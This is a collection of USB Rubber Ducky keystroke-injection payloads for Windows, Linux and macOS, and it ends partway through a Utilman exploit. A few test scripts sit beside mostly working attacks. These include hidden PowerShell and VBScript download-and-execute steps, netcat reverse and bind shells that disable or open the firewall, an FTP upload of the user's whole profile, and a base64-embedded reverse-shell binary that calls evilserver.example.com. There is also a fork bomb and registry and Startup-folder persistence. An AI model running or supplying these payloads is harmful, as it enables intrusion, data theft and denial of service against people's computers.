Rubber Ducky Payloads

Boring Utility

Hello World (Windows)

For testing functionality.

DELAY 3000
GUI r
DELAY 500
STRING notepad
DELAY 500
ENTER
DELAY 750
STRING Hello World!!!
ENTER

Hide cmd window (Windows)

The following is an example of how to hide the command window below the bottom of the screen while typing in commands. The window movement part of the script can also be used on any other window. CMD.exe is also run with some command line flags for changing the appearance of the window to make it harder to view, and also a flag that turns on delayed expansion in the command prompt which allows for variable names to be called more than once in a line with no adverse effects. Example: SET Something = Something + Something_Else

REM Target: WINDOWS VISTA/7
REM Encoder V2.4
REM Using the run command for a broader OS base.
DELAY 3000
GUI r
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

The following is an attempt to create a hide CMD window script that uses a key combo to run as administrator when UAC is turned on.

REM Target: WINDOWS VISTA
REM Encoder V2.4
REM Purpose: Hide cmd window script that uses a key combo to circumvent UAC limitations.
DELAY 3000
CONTROL ESCAPE
DELAY 500
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
CTRL-SHIFT ENTER
DELAY 1000
ALT C
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

Other windows can be hidden also, as demonstrated in this powershell hide, get, and execute.

REM Target: WINDOWS VISTA/7
REM Encoder V2.4
REM Using the run command for a broader OS base.
DELAY 3000
GUI r
DELAY 1000
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

Windows can also be hidden on other sides of the screen example: replace DOWNARROW with RIGHTARROW, LEFTARROW, UPARROW.

Basic Terminal Commands (Ubuntu)

The following script is an example of how to execute commands in Ubuntu Linux through xterm. The script first initiates the run application window through ubuntu and later on it triggers the command xterm. After the execution of the terminal it issues the commands “pwd”, “id” and “cat /etc/passwd”.

DELAY 3000
ALT F2
DELAY 500
STRING xterm
DELAY 500
ENTER
DELAY 750
STRING pwd
DELAY 500
ENTER
DELAY 300
STRING id
DELAY 300
ENTER
DELAY 500
STRING cat /etc/passwd
DELAY 500
ENTER

Mobiletabs (Windows)

Types in a VB script that sends command line arguments to internet explorer and opens new tabs based on the URLs you specify via command line.

GUI r
STRING cmd /Q /D /T:0a /F:OFF /V:OFF /K
DELAY 500
ENTER
DELAY 750
REM DELETE THE SCRIPT IF IT ALREADY EXISTS
STRING DEL /Q MobileTabs.vbs
ENTER
REM VB SCRIPT FOUND AT:
REM http://www.vistaheads.com/forums/microsoft-public-internetexplorer-general/438407-command-line-open-several-websites-multiple-tabs.htmlinternetexplorer
REM INPUT FILE MobileTabs.vbs
STRING copy con MobileTabs.vbs
ENTER
STRING on error resume next
ENTER
STRING navOpenInBackgroundTab = &h1000
ENTER
STRING set oIE = CreateObject("InternetExplorer.Application")
ENTER
STRING Set args = WScript.Arguments
ENTER
STRING oIE.Navigate2 args.Item(0)
ENTER
STRING for intx = 1 to args.count
ENTER
STRING oIE.Navigate2 args.Item(intx), navOpenInBackgroundTab
ENTER
STRING next
ENTER
STRING oIE.Visible = true
ENTER
CONTROL z
ENTER
REM RUN THE VB SCRIPT TO LAUNCH INTERNET EXPLORER
REM THE DOUBLE QUOTES BECOME MORE IMPORTANT FOR LONGER URLs
STRING MobileTabs.vbs "http://www.google.com/" "http://mwomercs.com/" "http://hak5.org/" "http://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/"
ENTER

Generic batch

A generic batch payload with built in persistence via registry key. Only runs as advertised on admin accounts.

REM Target: WINDOWS VISTA/7
REM ADMIN PRIVILEGES
REM PURPOSE: to create a script that types in a generic batch file and executes siletntly.
REM Using the run command for a broader OS base.
DELAY 3000
GUI r
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Make batch file.
REM Delete batch file if already exists.
STRING erase /Q batch.bat
ENTER
REM Make the batch file.
STRING copy con batch.bat
ENTER
REM Registry key that restarts script on reboot.
STRING REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "wscript.exe %TEMP%\invis.vbs %TEMP%\batch.bat" /f
ENTER
REM Copy invis.bat to another location
STRING move invis.vbs %TEMP%
ENTER
REM Copy current program to another location.
STRING move %0 %TEMP%
ENTER
REM Continue batch file contents here. . .
CONTROL z
ENTER
REM Make the VBS file that allows running invisibly.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL z
ENTER
STRING wscript.exe invis.vbs batch.bat
ENTER
STRING exit
ENTER

Run exe from SD

The following is a payload I have been working on that waits until a drive labeled “DUCKY” is mounted. I have used some of midnightsnake’s code in this payload. The name of the file that is run can be changed to .exe, I am just having it run a batch for testing purposes. The line that says “STRING START %myd%\myEXE.bat” is the line that executes the executable.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 25
DELAY 3000
GUI r
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

The following is the batch file that is run after the “DUCKY” drive has been mounted. Everything is being run invisibly, so you will need to check for the existence of “Message.txt” which will probably be in “C:\Windows\system32”.

REM Message.txt
echo Hello Wolrd!!!
echo Hello World!!! > Message.txt

The encoders now support the repeat command, so should only be a problem if you are using an old encoder. Encoders also now support white space in the duck script, so functions have been separated with white space.

The following is a newer version of the RunEXE from SD payload which uses googleknowsbest’s method for finding the “DUCKY” drive, which is more portable than the previous version’s method. This version should work on all current Windows versions. (XP, Vista, 7).

REM Author: overwraith
REM Name: RunEXE_V2.txt
REM Purpose: Run an executable file off of the SD card after it mounts. Uses googleknowsbest's slightly more portable method to find the "Ducky" drive.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 75
DELAY 3000
GUI r
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
ENTER
STRING if Exist %DUCKYdrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %DUCKYdrive%\HelloWorld.exe
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
REM STRING EXIT
REM ENTER

The following is another take on the RunEXE from SD payload, I think the micro SD connection is faster than it used to be, it could just be me. Here I am using a special for loop which uses the ‘Vol’ command for volume information. I am pretty sure it runs on most Windows boxes, and am reasonably sure it runs on most old computers. The main reason for the revamp is to eliminate some of the problems associated with the ‘diskpart’ command, which if run on a non admin box will cause previous scripts to essentially hang.

REM Author: overwraith
REM Name: RunEXE_V3.txt
REM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different version of the drive finder code.
REM Encoder V2.4+
REM Using the run command for a broader OS base.
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do (
ENTER
STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do (
ENTER
STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" )
ENTER
STRING )
ENTER
STRING )
ENTER
STRING if Exist %DuckyDrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %DuckyDrive%\HelloWorld.exe
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

Run java from SD

The following is another payload for running applications on Twin duck firmware from off your SD card automatically. This payload waits for the ducky drive to mount, then switches to the directory containing the Java payload, then launches the payload. I don’t know how useful this will be, but it is here if you need it. This only runs on Windows systems, but should run on all current Windows thanks to some code written by googleknowsbest. Change “JavaApp” to the name of your application.

REM Author: overwraith
REM Name: Java_Application.txt
REM Purpose: Run a java application off the ducky drive after it mounts.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 25
DELAY 3000
GUI r
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
ENTER
STRING if Exist %DUCKYdrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING %DUCKYdrive%
ENTER
STRING cd Java_Application
ENTER
STRING Java JavaApp
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

If you are not containing this script and the application within a folder on the ducky drive, then remove this line:

STRING cd Java_Application
ENTER

Copy file to Desktop

The following is something I have been working on based on the payload “Runexe from SD”. This payload will work on the twin duck firmwares by executing a script that waits for the ducky to mount the removable storage. The payload also uses some of the member googleknowsbest’s code. The for loop which polls for the ducky is the code to which I am referring to. This payload is not hacking related per say, but it could be useful to those who miss autorun files, and sneaker nets.

REM Author: overwraith
REM Name: CopyFileToDesktop.txt
REM Purpose: Wait for ducky mass storage to mount, then copy file to desktop.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 75
DELAY 3000
GUI r
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
ENTER
STRING if Exist %DUCKYdrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
REM Remove the next two lines if you don't place your payloads in separate folders.
STRING set DUCKYdrive=%DUCKYdrive%\CopyFileToDesktop\
ENTER
STRING copy %DUCKYdrive%HelloWorld.exe %userprofile%\Desktop\HelloWorld.exe
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

There is a group of lines you may wish to remove if you are operating from the root of the ducky, I have the script running out of a folder on the ducky, not the root.

REM Remove the next two lines if you don't place your payloads in separate folders.
STRING set DUCKYdrive=%DUCKYdrive%\CopyFileToDesktop\
ENTER

The script copies HelloWorld.exe out of the folder “CopyFileToDesktop”.

EICAR AV test (Windows)

DEFAULTDELAY 500
GUI r
STRING notepad.exe
ENTER
STRING X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
CTRL s
STRING %USERPROFILE%\desktop\eicar.com
ENTER
ALT F4

Download/Upload

Netcat FTP download and reverse shell (Windows)

This script will:

Fill in the required information where you see the brackets.

DELAY 10000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING cd %USERPROFILE%
ENTER
DELAY 100
STRING netsh firewall set opmode disable
ENTER
DELAY 2000
STRING echo open [IP] [PORT] > ftp.txt
ENTER
DELAY 100
STRING echo [USERNAME]>> ftp.txt
ENTER
DELAY 100
STRING echo [PASSWORD]>> ftp.txt
ENTER
DELAY 100
STRING echo bin >> ftp.txt
ENTER
DELAY 100
STRING echo get nc.exe >> ftp.txt
ENTER
DELAY 100
STRING echo bye >> ftp.txt
ENTER
DELAY 100
STRING ftp -s:ftp.txt
ENTER
STRING del ftp.txt & exit
ENTER
DELAY 2000
GUI r
DELAY 200
STRING nc.exe [LISTENER IP] [LISTENER PORT] -e cmd.exe -d
ENTER
DELAY 2000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING exit
ENTER

Netcat Reverse Shell (Windows)

Change the following details:

REM Title: Netcat Reverse Shell
REM Author: Kanishk Singh
REM Version: 1
REM Description:
DELAY 200
REM --> Minimize all windows
WINDOWS d
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb RunAs
ENTER
DELAY 1500
ALT y
DELAY 500
STRING cd %TEMP%
ENTER
REM --> Kills already running Netcat instance (if any)
STRING TASKKILL /im nc.exe /f
ENTER
REM --> Delete nc.exe file if it already exists
STRING erase /Q nc.exe
ENTER
REM --> Delete Start batch file if it already exists
STRING erase /Q Start.bat
ENTER
REM --> Delete Invisible.vbs in temp folder, if it already exists
STRING erase /Q invisible.vbs
ENTER
REM --> Delete invisible.vbs file in Startup if it already exists
STRING erase /Q "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\invisible.vbs"
ENTER
DELAY 500
REM --> Downloads NetCat
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://[NETCAT_DOWNLOAD_LINK]/nc.exe','nc.exe')
ENTER
DELAY 500
REM --> Creates a batch file to start listening
STRING copy con Start.bat
ENTER
STRING nc -lp [PORT] -vv -e cmd.exe -L
ENTER
CONTROL z
ENTER
REM --> Starts batch file invisibly
STRING copy con invisible.vbs
ENTER
STRING Set WshShell = CreateObject("WScript.Shell" )
ENTER
STRING WshShell.Run chr(34) & "%TEMP%\Start.bat" & Chr(34), 0
ENTER
STRING Set WshShell = Nothing
ENTER
CONTROL z
ENTER
REM --> Add netcat to allowed programs list, enabling it to communicate through the firewall seamlessly
STRING netsh advfirewall firewall add rule name="Netcat" dir=in action=allow program="%TEMP%\nc.exe" enable=yes
ENTER
STRING start invisible.vbs
ENTER
DELAY 100
REM --> Copies invisible.vbs to startup folder for persistence
STRING copy "invisible.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
ENTER
REM --> Kills CMD while nc.exe continues running in background, remove Ducky after CMD closes
STRING exit
ENTER

Downloader (Windows)

Opens the command prompt (not as administrator) creates a VBscript to download a file from any URL. Downloads a file and executes it. Useful for downloading small .exe files from a web server and executing them.

ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
ENTER
DELAY 400
STRING copy con download.vbs
ENTER
STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/")))
ENTER
STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send()
ENTER
STRING If objXMLHTTP.Status = 200 Then
ENTER
STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open
ENTER
STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0
ENTER
STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a
ENTER
STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing
ENTER
STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing
ENTER
CTRL z
ENTER
STRING cscript download.vbs <INSERT URL HERE>
ENTER
STRING <INSERT EXE FILENAME HERE>
ENTER
STRING exit
ENTER

Example:

ENTER
STRING cscript download.vbs http://example.com/fun_windows_executable.exe
ENTER
STRING fun_windows_executable.exe
ENTER
STRING exit
ENTER

FTP download/upload (Windows)

This script downloads WinSCP and uploads the user profile, recursive, to a FTP server.

GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING cd %USERPROFILE%
ENTER
STRING ftp -i SERVER
ENTER
DELAY 800
STRING USERNAME
ENTER
STRING PASSWORD
ENTER
STRING GET WinSCP.com
ENTER
DELAY 200
STRING GET WinSCP.exe
ENTER
DELAY 3000
STRING quit
ENTER
REM FTP user only needs write access.
STRING WinSCP.com /command "option batch abort" "option confirm off" "open ftp://USERNAME2:PASSWORD2@SERVER2" "put *.*" "close" "exit"
ENTER
ALT SPACE
STRING N

Powershell wget execute (Windows)

Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies.

GUI r
DELAY 100
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://example.com/bob.txt',\"$env:temp\bob.exe\"); Start-Process \"$env:temp\bob.exe\""
ENTER

NOTE: -windowstyle hidden hides the powershell window. Also mind the escaped quotes around $env:temp, otherwise the environment variable won’t expand.

This is an improved version for the code above.

REM You can remove this Delay line in the beginning (I just rather having it just in case)
DELAY 60000
REM open the Run
GUI r
REM Change this value depending on the computer you are using ( i mean slow or not )
DELAY 100
STRING powershell -windowstyle hidden
ENTER
REM the shell usually takes a few  seconds to fully run so i put a delay just in case .
DELAY 1000
REM I just wanted to note that the file can be an EXE or JAR file doesn't really matter.
REM in the destination if you put the fileName only, the file will be saved under C:\Users\LoggedInUser
STRING $source = "File URL "; $destination = "Path\FileName"; Invoke-WebRequest $source -OutFile $destination;
ENTER
DELAY 5000
STRING start-process FileName.EXE
ENTER
DELAY 100
STRING exit
ENTER

Full Example with Jar:

REM You can remove this Delay line in the beginning (I just rather having it just in case)
DELAY 60000
REM open the Run
GUI r
REM Change this value depending on the computer you are using ( i mean slow or not )
DELAY 100
STRING powershell -windowstyle hidden
ENTER
REM the shell usually takes a few  seconds to fully run so i put a delay just in case .
DELAY 1000
REM I just wanted to note that the file can be an EXE or JAR file doesn't really matter.
REM in the destination if you put the fileName only, the file will be saved under C:\Users\LoggedInUser
STRING $source = "http://192.168.43.34/Service.jar"; $destination = "Service.jar"; Invoke-WebRequest $source -OutFile $destination;
ENTER
DELAY 5000
STRING start-process Service.jar
ENTER
DELAY 100
STRING exit
ENTER

Download and execute file with Powershell (Windows)

REM Windows 10: Poweshell administrator download and execute file
REM Author: Judge2020
REM author website: Judge2020.com
REM
REM start of script
REM
REM let the HID enumerate
DELAY 1000
GUI r
DELAY 200
REM my best attempt at a elevated powershell instance
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1000
ALT y
DELAY 200
STRING $down = New-Object System.Net.WebClient; $url = 'http://www.greyhathacker.net/tools/messbox.exe'; $file = 'mess1.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;

Wget and execute (OSX)

REM Simple script that downloads any file and runs it.
REM Requires duckencoder 2.6.3 which can be downloaded at http://goo.gl/QkTXNp
REM Note: you must put in your own specific code to execute
DELAY 1000
COMMAND SPACE
DELAY 800
STRING Terminal
DELAY 500
ENTER
DELAY 500
STRING curl http://SERVER/path/to/file > file
ENTER
DELAY 1000
STRING INSERT COMMAND TO EXECUTE HERE
ENTER
REM You can chage the above line to the command used to open your program.
REM Examples: python somescript.py , ./somescript.sh
REM Note: This script doesn't delete the downloaded file so it may leave evidence of physical access.  Delete it as quickly as possible after this runs.
REM Or alternatively you could hide it somewhere in a hidden folder where it won't be easily found.

Hacks & Exploits

Reverse shell (Windows)

Opens administrative CMD prompt, creates decoder.vbs containing code to convert base64 encoded ascii to binary, creates text file including base64 ascii of binary file to create reverse shell. converts second file to exe with first file. Executes with host and port parameters.

ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 600
LEFTARROW
ENTER
DELAY 400
STRING copy con c:\decoder.vbs
ENTER
STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS =
STRING CreateObject("Scripting.FileSystemObject"):
ENTER
STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded =
STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function
STRING decodeBase64(base64):
ENTER
STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub
STRING writeBytes(file, bytes):Dim binaryStream:
ENTER
STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
ENTER
CTRL z
ENTER
STRING copy con c:\reverse.txt
ENTER
STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA
ENTER
STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA
ENTER
STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA
ENTER
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ENTER
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS
ENTER
STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA
ENTER
STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2
ENTER
STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A
ENTER
STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA
ENTER
STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA
ENTER
STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq
ENTER
STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF
ENTER
STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv
ENTER
STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp
ENTER
STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm
ENTER
STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A
ENTER
STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s
ENTER
STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9
ENTER
STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp
ENTER
STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY
ENTER
STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B
ENTER
STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk
ENTER
STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA
ENTER
STRING AAxAAADpdL7//wAAAAIAAAAMQAAA
ENTER
CTRL z
ENTER
STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe
ENTER
STRING c:\reverse.exe evilserver.example.com 8080
ENTER
STRING exit
ENTER

Receive reverse shell with netcat. For example:

nc -l 8080

Fork bomb (Windows)

Opens a command prompt as administrator with run, uses con copy to create fork bomb batch(if you don’t know what this is then see: http://en.wikipedia.org/wiki/Fork_bomb). Then saves the .bat file under the start up program folder and runs it the first time.

CONTROL ESCAPE
DELAY 200
STRING cmd
DELAY 200
MENU
DELAY 100
STRING a
ENTER
DELAY 200
LEFT
ENTER
DELAY 1000
STRING cd %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\
ENTER
STRING copy con a.bat
ENTER
STRING @echo off
ENTER
STRING :START
ENTER
STRING start a.bat
ENTER
STRING GOTO START
ENTER
CONTROL z
ENTER
STRING a.bat
ENTER
ALT F4

Utilman exploit (Windows)

Uses the Utilman.exe Exploit to create a new local administrator account “Local000” with the password “hak5”.

GUI
DELAY 50
STRING cmd
MENU
STRING a
ENTER
LEFT
ENTER
DELAY 200
STRING takeown /f "%systemroot%\System32\Utilman.exe"
ENTER
DELAY 50
